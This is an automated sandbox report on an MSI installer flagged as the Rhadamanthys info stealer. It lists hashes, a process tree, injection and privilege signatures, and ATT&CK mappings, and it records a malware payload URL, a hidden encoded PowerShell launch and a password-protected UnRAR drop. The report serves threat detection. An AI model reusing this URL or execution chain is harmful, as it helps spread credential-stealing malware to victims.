Analysis
- max time kernel: 231s
- max time network: 233s
- platform: windows11-21h2_x64
- resource: win11-20240611-en
- resource tags: arch:x64, arch:x86, image:win11-20240611-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 27-06-2024 00:44
- Static task: static1
- Behavioral task: behavioral1
- Sample: setup.msi
- Resource: win11-20240611-en
General
- Target: setup.msi
- Size: 25.2MB
- MD5: 3d87a0e5517c9a8fc4adde50bafe7c76
- SHA1: a1ba3b688dcb9b17ed1d430f3032e2884a0565e4
- SHA256: 49dc002fa1a0a1e33621a7d9340fb7bd0ac8b9834fc5958823d1f2bed6fa5956
- SHA512: ebadfdc465dc5c32c854931a9f8712320cfc3752e04b3fec56a1b103c6f225c1de0c6892b1cd90b362f56d38685b8d5851e2cbefdf3291f8389b5cea2e337042
- SSDEEP: 393216:f+KUUMVzPuPA9BA/UODO0HAAqC+7Rw+lK2WhAS7KdROb7xmq7IrWowIpUDV5:f+YMVD9cECbq+QWhASOdM3N7gTwx
Malware Config
- Extracted: https://gotry-gotry.com/2506s.bs64
Signatures
- Rhadamanthys
  Rhadamanthys is an info stealer written in C++ first seen in August 2022.
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoCs)
  Processes: explorer.exe
  (description | pid | process | target process)
    PID 1896 created 1320 | 1896 | explorer.exe | sihost.exe
- Blocklisted process makes network request (4 IoCs)
  Processes: MsiExec.exe, powershell.exe
  (flow | pid | process)
    2 | 1000 | MsiExec.exe
    3 | 1000 | MsiExec.exe
    4 | 1000 | MsiExec.exe
    11 | 3360 | powershell.exe
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Run Powershell and hide display window.
- Enumerates connected drives (3 TTPs, 46 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes: msiexec.exe, msiexec.exe
  (description | ioc | process)
    File opened (read-only) | \??\A:, \??\B:, \??\E:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: (every drive letter except C:, D: and F:; two rows per letter, 46 rows in total) | msiexec.exe
- Suspicious use of SetThreadContext (1 IoCs)
  Processes: steamerrorreporter64.exe
  (description | pid | process | target process)
    PID 4172 set thread context of 1896 | 4172 | steamerrorreporter64.exe | explorer.exe
- Drops file in Windows directory (24 IoCs)
  Processes: msiexec.exe, UserOOBEBroker.exe
  (description | ioc | process)
    File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
    File created | C:\Windows\Installer\SourceHash{4FC60505-AFAE-4294-8C0A-19D5DD0202F0} | msiexec.exe
    File created | C:\Windows\Installer\e577b8d.msi | msiexec.exe
    File opened for modification | C:\Windows\Panther\UnattendGC\setupact.log | UserOOBEBroker.exe
    File opened for modification | C:\Windows\Installer\MSI83BD.tmp | msiexec.exe
    File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
    File opened for modification | C:\Windows\Installer\e577b89.msi | msiexec.exe
    File opened for modification | C:\Windows\Installer\MSI7C55.tmp | msiexec.exe
    File opened for modification | C:\Windows\Installer\MSI7C75.tmp | msiexec.exe
    File opened for modification | C:\Windows\Installer\MSI7C86.tmp | msiexec.exe
    File opened for modification | C:\Windows\Installer\MSI7CB7.tmp | msiexec.exe
    File opened for modification | C:\Windows\Installer\MSI840C.tmp | msiexec.exe
    File created | C:\Windows\SystemTemp\~DFFA823DD285715C26.TMP | msiexec.exe
    File created | C:\Windows\Installer\e577b89.msi | msiexec.exe
    File opened for modification | C:\Windows\Panther\UnattendGC\diagwrn.xml | UserOOBEBroker.exe
    File opened for modification | C:\Windows\Installer\MSI7C96.tmp | msiexec.exe
    File opened for modification | C:\Windows\Installer\ | msiexec.exe
    File created | C:\Windows\SystemTemp\~DF21FFABFCD633CCB9.TMP | msiexec.exe
    File created | C:\Windows\SystemTemp\~DFB33D1417A1FDE386.TMP | msiexec.exe
    File opened for modification | C:\Windows\Installer\MSI8F09.tmp | msiexec.exe
    File created | C:\Windows\SystemTemp\~DF746BB67D5CF40B16.TMP | msiexec.exe
    File opened for modification | C:\Windows\Panther\UnattendGC\setuperr.log | UserOOBEBroker.exe
    File opened for modification | C:\Windows\Installer\MSI7BD7.tmp | msiexec.exe
    File opened for modification | C:\Windows\Panther\UnattendGC\diagerr.xml | UserOOBEBroker.exe
- Executes dropped EXE (2 IoCs)
  Processes: UnRAR.exe, steamerrorreporter64.exe
  (pid | process)
    2004 | UnRAR.exe
    4172 | steamerrorreporter64.exe
- Loads dropped DLL (10 IoCs)
  Processes: MsiExec.exe, steamerrorreporter64.exe
  (pid | process)
    1000 | MsiExec.exe (8 rows)
    4172 | steamerrorreporter64.exe (2 rows)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Accessibility Features (1 TTPs)
  Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
- Event Triggered Execution: Installer Packages (1 TTPs, 1 IoCs)
- Program crash (3 IoCs)
  Processes: WerFault.exe, WerFault.exe, WerFault.exe
  (pid | pid_target | process | target process)
    844 | 1896 | WerFault.exe | explorer.exe
    3556 | 1896 | WerFault.exe | explorer.exe
    5020 | 1896 | WerFault.exe | explorer.exe
- Enumerates system info in registry (2 TTPs, 6 IoCs)
  Processes: msedge.exe, chrome.exe
  (description | ioc | process)
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
- Modifies data under HKEY_USERS (2 IoCs)
  Processes: chrome.exe
  (description | ioc | process)
    Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | chrome.exe
    Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133639229423965210" | chrome.exe
- Modifies registry class (1 IoCs)
  Processes: msedge.exe
  (description | ioc | process)
    Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1276817940-128734381-631578427-1000\{DF08ACE6-6E63-4F03-AC6D-3D4807E41099} | msedge.exe
- Suspicious behavior: EnumeratesProcesses (22 IoCs)
  Processes: msiexec.exe, powershell.exe, explorer.exe, openwith.exe, msedge.exe, msedge.exe, msedge.exe, identity_helper.exe, msedge.exe, chrome.exe
  (pid | process)
    324 | msiexec.exe (2 rows)
    3360 | powershell.exe (2 rows)
    1896 | explorer.exe (2 rows)
    1548 | openwith.exe (4 rows)
    3328 | msedge.exe (2 rows)
    948 | msedge.exe (2 rows)
    3724 | msedge.exe (2 rows)
    1356 | identity_helper.exe (2 rows)
    3280 | msedge.exe (2 rows)
    1220 | chrome.exe (2 rows)
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (13 IoCs)
  Processes: msedge.exe, chrome.exe
  (pid | process)
    948 | msedge.exe (10 rows)
    1220 | chrome.exe (3 rows)
- Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes: msiexec.exe, msiexec.exe
  (description | pid | process), grouped here by pid
    PID 1944 msiexec.exe, one row per token in this order: SeShutdownPrivilege, SeIncreaseQuotaPrivilege, SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege (31 rows)
    PID 324 msiexec.exe: Token: SeSecurityPrivilege (1 row), then Token: SeRestorePrivilege and Token: SeTakeOwnershipPrivilege alternating (16 rows each, 32 rows)
- Suspicious use of FindShellTrayWindow (55 IoCs)
  Processes: msiexec.exe, msedge.exe, chrome.exe
  (pid | process)
    1944 | msiexec.exe (2 rows)
    948 | msedge.exe (26 rows)
    1220 | chrome.exe (27 rows)
- Suspicious use of SendNotifyMessage (24 IoCs)
  Processes: msedge.exe, chrome.exe
  (pid | process)
    948 | msedge.exe (12 rows)
    1220 | chrome.exe (12 rows)
- Suspicious use of SetWindowsHookEx (43 IoCs)
  Processes: osk.exe, chrome.exe
  (pid | process)
    5084 | osk.exe (11 rows, interleaved with the chrome.exe rows)
    1220 | chrome.exe (32 rows)
- Suspicious use of WriteProcessMemory (64 IoCs)
  Processes: msiexec.exe, steamerrorreporter64.exe, explorer.exe, msedge.exe
  (description | pid | process | target process), identical rows grouped
    PID 324 wrote to memory of 1000 | 324 | msiexec.exe | MsiExec.exe (3 rows)
    PID 324 wrote to memory of 2004 | 324 | msiexec.exe | UnRAR.exe (2 rows)
    PID 324 wrote to memory of 4172 | 324 | msiexec.exe | steamerrorreporter64.exe (2 rows)
    PID 4172 wrote to memory of 1896 | 4172 | steamerrorreporter64.exe | explorer.exe (4 rows)
    PID 1896 wrote to memory of 3360 | 1896 | explorer.exe | powershell.exe (2 rows)
    PID 1896 wrote to memory of 1548 | 1896 | explorer.exe | openwith.exe (5 rows)
    PID 948 wrote to memory of 804 | 948 | msedge.exe | msedge.exe (2 rows)
    PID 948 wrote to memory of 956 | 948 | msedge.exe | msedge.exe (40 rows)
    PID 948 wrote to memory of 3328 | 948 | msedge.exe | msedge.exe (2 rows)
    PID 948 wrote to memory of 1628 | 948 | msedge.exe | msedge.exe (2 rows)
Processes (indented by depth in the process tree)
- C:\Windows\system32\sihost.exe
  command: sihost.exe
  - C:\Windows\SysWOW64\openwith.exe
    command: "C:\Windows\system32\openwith.exe"
    signatures: Suspicious behavior: EnumeratesProcesses
  - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:https://www.bing.com/search?q=windows%2011%20keyboard%20shortcuts%20site:microsoft.com&form=B00032&ocid=SettingsHAQ-BingIA&mkt=en-US
    signatures: Enumerates system info in registry; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of WriteProcessMemory
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffb38c63cb8,0x7ffb38c63cc8,0x7ffb38c63cd8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
      signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5356 /prefetch:8
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5028 /prefetch:8
      signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3448 /prefetch:8
      signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:8
      signatures: Suspicious behavior: EnumeratesProcesses
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
    - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1932,9620259903146541056,3010233944535790833,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
- C:\Windows\system32\msiexec.exe
  command: msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\setup.msi
  signatures: Enumerates connected drives; Event Triggered Execution: Installer Packages; Suspicious use of AdjustPrivilegeToken; Suspicious use of FindShellTrayWindow
- C:\Windows\system32\msiexec.exe
  command: C:\Windows\system32\msiexec.exe /V
  signatures: Enumerates connected drives; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  - C:\Windows\syswow64\MsiExec.exe
    command: C:\Windows\syswow64\MsiExec.exe -Embedding 8D0724BC2649207211B6B8DB7F9A763A
    signatures: Blocklisted process makes network request; Loads dropped DLL
  - C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe
    command: "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\UnRAR.exe" x -p2664926658a "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\ruw9eigh.rar" "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\"
    signatures: Executes dropped EXE
  - C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe
    command: "C:\Users\Admin\AppData\Roaming\Kidoc Wiasc Publisher\PubQuo\steamerrorreporter64.exe"
    signatures: Suspicious use of SetThreadContext; Executes dropped EXE; Loads dropped DLL; Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\explorer.exe
      command: C:\Windows\SysWOW64\explorer.exe explorer.exe
      signatures: Suspicious use of NtCreateUserProcessOtherParentProcess; Suspicious behavior: EnumeratesProcesses; Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell -windowstyle hidden -e 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
        signatures: Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses
      - C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1816
        signatures: Program crash
      - C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1820
        signatures: Program crash
      - C:\Windows\SysWOW64\WerFault.exe
        command: C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 1824
        signatures: Program crash
- C:\Windows\SysWOW64\WerFault.exe
  command: C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1896 -ip 1896
- C:\Windows\SysWOW64\WerFault.exe
  command: C:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 1896 -ip 1896
- C:\Windows\SysWOW64\WerFault.exe
  command: C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1896 -ip 1896
- C:\Windows\System32\rundll32.exe
  command: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
- C:\Windows\system32\svchost.exe
  command: C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
- C:\Windows\System32\oobe\UserOOBEBroker.exe
  command: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
  signatures: Drops file in Windows directory
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
  command: C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe
  command: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\CompPkgSrv.exe
  command: C:\Windows\System32\CompPkgSrv.exe -Embedding
- C:\Windows\System32\ATBroker.exe
  command: C:\Windows\System32\ATBroker.exe /start osk
  - C:\Windows\System32\osk.exe
    command: "C:\Windows\System32\osk.exe"
    signatures: Suspicious use of SetWindowsHookEx
- C:\Windows\system32\AUDIODG.EXE
  command: C:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004DC
- C:\Program Files\Google\Chrome\Application\chrome.exe
  command: "C:\Program Files\Google\Chrome\Application\chrome.exe"
  signatures: Enumerates system info in registry; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary; Suspicious use of FindShellTrayWindow; Suspicious use of SendNotifyMessage; Suspicious use of SetWindowsHookEx
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffb1e4eab58,0x7ffb1e4eab68,0x7ffb1e4eab78
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1612 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:2
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1840 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2112 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:8
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3096 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4356 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:1
  - C:\Program Files\Google\Chrome\Application\chrome.exe
    command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4512 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:8
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4504 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4748 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4696 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 --field-trial-handle=1964,i,12142239648213703891,12329461928626343553,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
- Event Triggered Execution (2)
  - Accessibility Features (1)
  - Installer Packages (1)
Privilege Escalation
- Event Triggered Execution (2)
  - Accessibility Features (1)
  - Installer Packages (1)
Downloads
-
C:\Config.Msi\e577b8c.rbs
Filesize 22KB
MD5 320efff92837a6d5c83e73a403e67fbb
SHA1 7eb8004b822fb5b12073014ef3be63120070534b
SHA256 e85e262cb9e7e72d0c2a1c1c7ae91a70de5d1fa27789e7966546e8b760c86bd3
SHA512 144716d471d1737d0340feae6a3bfd5d5c4477b370c1a09886c1dab0e041c257548e3bf0fc9a1d12aa1e21256d30de36828eb1820666031e2ddcefbda734b5b7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\585535ac-e32f-4200-95eb-4eee540a530e.tmp
Filesize 281KB
MD5 ff2359bdc2252e49224218ad007ecb16
SHA1 8bafef81682129e355c0e1adf804d7b4e5c3f5f2
